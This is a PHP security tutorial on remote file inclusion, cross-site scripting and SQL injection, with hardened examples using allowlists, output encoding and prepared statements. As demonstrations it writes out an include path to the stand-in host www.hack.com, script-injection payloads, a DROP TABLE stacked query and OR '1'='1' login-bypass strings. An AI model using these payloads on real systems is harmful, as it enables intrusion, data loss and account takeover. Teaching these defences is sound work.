As PHP programmers, the first lesson we learn is the basic syntax. So what should we learn once we are comfortable with the syntax? I think it is security. Security is the cornerstone a website stands on; one careless line can mean a catastrophic incident.
This article covers three of the simplest, but also the most important, security issues. I'll add more later.
1. Include
Sometimes we include a file based on the user's input, for example:
include $filename . '.php';
If $filename points to an external site, such as http://www.hack.com/hack, this will undoubtedly lead to a security breach: with allow_url_include enabled, PHP fetches and executes the remote script (remote file inclusion).
So before writing such an include statement, we must first check that the file exists locally:
if (file_exists($filename . '.php')) include $filename . '.php';
Note that file_exists() does not accept http:// URLs, so this rejects remote files, but it still accepts any local path the user supplies, including ../ traversal into other directories. Where possible, map the request to a fixed list of allowed page names instead of building the path from input.
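The three ways of writing this include side by side, as an added example that is not code from the original article. The page names home, about and contact and the ./pages/ directory are assumptions for the illustration.

```php
<?php
// Added example, not code from the original article: three ways of writing the include.
// Assumed layout: page files live in ./pages/ and are named home.php, about.php, contact.php.

// 1. Vulnerable: the path is built from user input. With allow_url_include=On,
//    $filename = 'http://www.hack.com/hack' fetches and executes remote code;
//    even with it Off, '../../some/local/file' includes files outside pages/.
function includeUnsafe(string $filename): void
{
    include $filename . '.php';
}

// 2. The article's check: file_exists() returns false for http:// URLs, so remote
//    inclusion is blocked, but any existing local path still passes.
function includeIfExists(string $filename): void
{
    if (file_exists($filename . '.php')) {
        include $filename . '.php';
    }
}

// 3. Hardened: the request selects a key in a fixed allowlist; the path itself is
//    never derived from user input, so neither URLs nor ../ can reach the include.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolvePage(string $requested): ?string
{
    return PAGES[$requested] ?? null;   // unknown key -> null, never a guessed path
}

$page = resolvePage($_GET['page'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

The allowlist version also gives a natural place to log unexpected page names, which is usually the first sign that someone is probing the include.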
2. XSS (cross-site scripting)
XSS, cross-site scripting, means the user puts a script statement such as <script>alert("I'm hacking")</script> into an input, and the page later outputs it unencoded, so the browser executes it.
Common places where XSS can be attacked include:
2.1 $_SERVER['PHP_SELF']
Example:
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>">
If the user requests the URL
http://www.example.com/test_form.php/%22%3E%3Cscript%3Ealert('hacked')%3C/script%3E
the form markup becomes:
<form method="POST" action="/test_form.php/"><script>alert('hacked')</script>">
and the injected JS runs. PHP_SELF includes the extra path information after the script name, and that part of the URL is under the attacker's control.
2.2 Script statements in form input
If the user types a script statement into a form field and we echo the submitted value straight back into the page without processing it, the script becomes part of our page. So data submitted from forms also has to be processed.
Example:
<form method="POST" action="test_form.php"><input name="text" type="text"></form>
If I enter <script>alert('hacked')</script> in the input box and the page displays what was entered, the script executes.
2.3 Processing methods
To prevent such attacks we can use the PHP function htmlspecialchars(), which converts special characters into HTML entities: < and > become &lt; and &gt;, & becomes &amp;, and with the ENT_QUOTES flag double and single quotes are encoded as well, so the browser displays the text instead of parsing it as markup. Apply it at the point where data is written into HTML, including attribute values such as the form's action. In addition we can:
1. remove unnecessary characters (extra spaces, tabs, line breaks) from user input with trim()
2. remove backslashes (\) from user input with stripslashes()
These two are cleanup steps only (stripslashes() dates from the magic_quotes era, which ended in PHP 5.4); they do not stop XSS and never replace htmlspecialchars() on output.
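Both XSS cases above, rendered once vulnerable and once encoded, as an added example that is not code from the original article. The helper name e() and the field name "text" are my choices; the two payloads are the ones the article shows, constructed here as test input.

```php
<?php
// Added example, not code from the original article: encoding untrusted data before it
// reaches HTML. Assumes the page is served as UTF-8 and the form field is named "text".

// One helper for every HTML text/attribute context. ENT_QUOTES matters: before PHP 8.1
// the default flags left single quotes alone, which breaks out of action='...' attributes.
function e(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Payloads from the article, constructed here as test input (not live request data).
$pathPayload  = "/test_form.php/\"><script>alert('hacked')</script>";   // what PHP_SELF would contain
$fieldPayload = "<script>alert('hacked')</script>";                      // what $_POST['text'] would contain

// Vulnerable: both values are copied into the page verbatim.
$vulnerable = '<form method="POST" action="' . $pathPayload . '">'
            . '<p>You typed: ' . $fieldPayload . '</p></form>';

// Hardened: encode at the output point. SCRIPT_NAME does not carry the extra path
// information that PHP_SELF does, but it is still encoded rather than trusted.
// trim() is cleanup only; it does not make the value safe, e() does.
$text = trim($fieldPayload);
$safe = '<form method="POST" action="' . e($_SERVER['SCRIPT_NAME'] ?? '/test_form.php') . '">'
      . '<p>You typed: ' . e($text) . '</p></form>';

echo $vulnerable, "\n";   // a browser would execute the script twice
echo $safe, "\n";         // a browser shows the literal text &lt;script&gt;...
```

Encoding belongs where the data is output, not where it is received: the same stored value may later be written into HTML, a JavaScript string, or a URL, and each context needs its own encoder.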
3. SQL injection
The main attack method is to put SQL into form input that the application concatenates into a query.
Take the following login form:
<form method="POST" action="test_form.php"><input name="id" type="text"><input name="password" type="password"></form>
If I enter  name; DROP TABLE user  in the ID box, and the back end builds the query as
"SELECT * FROM user WHERE id=" . $id;
the SQL statement becomes
SELECT * FROM user WHERE id=name; DROP TABLE user;
and the table is deleted. (The old mysql_query() runs only one statement per call, so this exact stacked payload fails there, but the same concatenation lets input such as  1 OR 1=1  return every row, and on a quoted field  ' OR '1'='1  bypasses a login check.) Preventing SQL injection is therefore especially important.
Processing method:
PHP has a dedicated function, mysql_real_escape_string(), that escapes the special characters in a string before it is placed inside quotes in an SQL statement.
Any form data that reaches the database must go through it.
Example:
$user = mysql_real_escape_string($user);
$pwd = mysql_real_escape_string($pwd);
$sql = "SELECT * FROM users WHERE user='" . $user . "' AND password='" . $pwd . "'";
Two caveats: the function only helps when the value sits inside quotes (the unquoted id=$id query above stays injectable), and the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7. Prepared statements with bound parameters (PDO or mysqli) are the current fix and cover both cases.
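The same login query written with bound parameters next to the concatenated version, as an added example that is not code from the original article. The DSN, credentials and the users(id, user, password) table are placeholders; the attacker input is constructed for the illustration.

```php
<?php
// Added example, not code from the original article: the login query with bound parameters.
// Assumes a MySQL database with a table users(id, user, password); DSN and credentials are
// placeholders to be replaced.

$pdo = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // server-side prepares: input can never become SQL text
]);

// Vulnerable (the article's shape). Note that escaping would not rescue the unquoted
// "WHERE id=" . $id form either: "1 OR 1=1" contains nothing for it to escape.
function findUserUnsafe(PDO $pdo, string $user, string $pwd): ?array
{
    $sql = "SELECT id, user FROM users WHERE user='" . $user . "' AND password='" . $pwd . "'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened: the SQL text is fixed at prepare time; the values travel separately,
// so quotes, semicolons or keywords in them are just characters in a string.
function findUser(PDO $pdo, string $user, string $pwd): ?array
{
    $stmt = $pdo->prepare('SELECT id, user FROM users WHERE user = :user AND password = :pwd');
    $stmt->execute([':user' => $user, ':pwd' => $pwd]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Constructed attacker input: closes the quoted string and appends an always-true condition,
// turning the WHERE clause into (user='admin' AND password='') OR '1'='1'.
$user = 'admin';
$pwd  = "' OR '1'='1";

var_dump(findUserUnsafe($pdo, $user, $pwd));   // first row of the table, no password needed
var_dump(findUser($pdo, $user, $pwd));         // NULL: the column is compared to the literal string
```

The prepared version also fixes the numeric case: bind the id with PDO::PARAM_INT and the driver, not the application, decides how the value is represented.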
The second lesson PHP programmers must learn: website security precautions